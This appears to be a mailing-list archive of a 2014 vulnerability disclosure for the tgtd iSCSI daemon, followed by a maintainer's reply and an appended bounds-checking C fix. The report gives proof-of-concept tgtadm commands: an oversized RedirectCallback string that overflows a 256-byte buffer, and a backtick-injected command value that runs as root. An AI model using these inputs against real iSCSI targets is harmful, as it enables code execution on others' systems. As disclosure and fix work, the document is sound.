[stgt] tgtd buffer overflow and command injection vulnerabilities
Hitoshi Mitake
mitake.hitoshi at gmail.com
Fri Jun 13 04:27:38 CEST 2014
At Tue, 10 Jun 2014 19:17:35 +0000,
Hullinger, Jason (Cloud Services) wrote:
>
> TGT Team:
>
> The function call_program in the tgtd daemon includes a callback function
> that will run arbitrary commands. Additionally, it does not check that the
> cmd argument is smaller than the allocated buffer size causing a buffer
> overflow. Example and proof of concept:
>
> usr/tgtd.c
>
> int call_program(const char *cmd, void (*callback)(void *data, int result),
> void *data, char *output, int op_len, int flags)
> ...
> char *pos, arg[256];
> ...
> str_spacecpy(&pos, cmd);
>
> Where str_spacecpy (usr/tgtd.c) chops multiple white spaces into one white
> space. It takes a dest buffer and copies into a src buffer:
>
> void str_spacecpy(char **dest, const char *src)
>
> call_program is called from usr/target.c in get_redirect_address
>
> static int
> get_redirect_address(char *callback, char *buffer, int buflen,
> char **address, char **ip_port, int *rsn)
> ...
> if (call_program(callback, NULL, NULL, buffer, buflen, 0))
> ...
>
> Where get_redirect_address is called from usr/target.c by:
>
> int target_redirected(struct iscsi_target *target,
> struct iscsi_connection *conn, char *buf, int *reason)
> ...
> char dst[INET6_ADDRSTRLEN], in_buf[1024];
> ...
> ret = get_redirect_address(in_buf, buffer,
> sizeof(buffer), &addr, &port, &rsn);
> ...
>
> in_buf, size 1024, is passed to call_program as 'cmd', which then copies
> into the dest char buffer of size 256 causing a buffer overflow.
>
> In addition to that, any arbitrary command line argument that is passed in
> by tgtadm will be executed. Example:
>
> sudo tgtd -C 1 --iscsi portal=127.0.0.1:860
> sudo ./scripts/tgt-admin -C 1 -e -c /home/ubuntu/tgt/targets.confg
>
> (in a different shell) sudo gdb --args tgtd -f -C 2 --iscsi
> portal=127.0.0.1
> sudo ./scripts/tgt-admin -C 2 -e -c /home/ubuntu/tgt/targets.confg
>
> sudo tgtadm -C 2 --op update --mode target --tid 1 --name RedirectAddress
> --value 127.0.0.1
> sudo tgtadm -C 2 --op update --mode target --tid 1 --name RedirectPort
> --value 860
> sudo tgtadm -C 2 --op update --mode target --tid 1 --name RedirectReason
> --value Temporary
>
> sudo tgtadm -C 2 --op update --mode target --tid 1 --name RedirectCallback
> --value
> 1zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
> zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
> zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
> zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
> zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
> zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
> zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
>
> sudo iscsiadm -m discovery -t st -p 127.0.0.1
> sudo iscsiadm -m node -p 127.0.0.1 -l
>
> Upon attempting to authenticate, the command set by the --name
> RedirectCallback --value tgtadm directive will attempt to be executed. If
> you replace the above example with:
>
> sudo tgtadm -C 2 --op update --mode target --tid 1 --name RedirectCallback
> --value "/usr/bin/logger `whoami`"
>
> You will see in the syslog file, where 'ubuntu' is the current user:
>
> ubuntu iqn.2014-05.local.localhost:foobar 127.0.0.1
>
> I'm a bit unclear as to what exactly is supposed to happen here, or what
> the intended result is, but it seems that arbitrary commands should not be
> allowed to be injected from tgtadm in addition to checking the strlen of
> cmd.
>
> Thanks, and let me know if I can answer or clarify any questions.
I'm still not digging into the problem, but it seems to be very
important. I added a new issue in the launchpad tracker:
https://bugs.launchpad.net/tgt-project/+bug/1329586
I'd like to fix it when I can allocate time for it, or have you
already created a patch for it?
Thanks,
Hitoshi
>
> Jason Hullinger
>
> Security Architect
> HP Helion Cloud
>
> --
> To unsubscribe from this list: send the line "unsubscribe stgt" in
> the body of a message to majordomo at vger.kernel.org
> More majordomo info at http://vger.kernel.org/majordomo-info.html
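As an added example (not tgt's own code, and not from either poster), here is the shape of the fix the report asks for: a bounds-checked version of the whitespace-collapsing copy, plus the length guard that call_program lacks before building its argument buffer. The function names and the 256-byte buffer size follow the report; the implementation itself is an assumption of mine.

```c
/* Added example, not tgt's code: bounded replacement for the copy the
 * report describes. ARG_BUF_SIZE mirrors arg[256] in call_program(). */
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define ARG_BUF_SIZE 256

/* Copy src into dest, squeezing each run of whitespace into a single
 * space, never writing more than destsz bytes including the NUL.
 * Returns the number of bytes stored (excluding the NUL), or -1 if the
 * collapsed string would not fit; on -1 dest is left as "". */
int str_spacecpy_bounded(char *dest, size_t destsz, const char *src)
{
    size_t n = 0;
    int last_was_space = 0;

    if (destsz == 0)
        return -1;
    dest[0] = '\0';

    for (; *src; src++) {
        if (isspace((unsigned char)*src)) {
            if (last_was_space)
                continue;           /* drop the rest of this run */
            last_was_space = 1;
        } else {
            last_was_space = 0;
        }
        if (n + 1 >= destsz) {      /* no room for this byte plus NUL */
            dest[0] = '\0';
            return -1;
        }
        dest[n++] = last_was_space ? ' ' : *src;
    }
    dest[n] = '\0';
    return (int)n;
}

/* Guard that call_program() should apply to its cmd argument: reject
 * anything (e.g. a 1024-byte in_buf from target_redirected) that cannot
 * be held in the arg buffer. Returns 0 when arg is safely filled. */
int check_call_program_cmd(const char *cmd, char *arg, size_t argsz)
{
    if (strlen(cmd) >= argsz)       /* cheap early reject, as the report suggests */
        return -1;
    return str_spacecpy_bounded(arg, argsz, cmd) < 0 ? -1 : 0;
}
```

Note that the length check alone is not sufficient for the command injection half of the report: it keeps the copy in bounds, but whether a value set through tgtadm should be executed at all is a separate policy question.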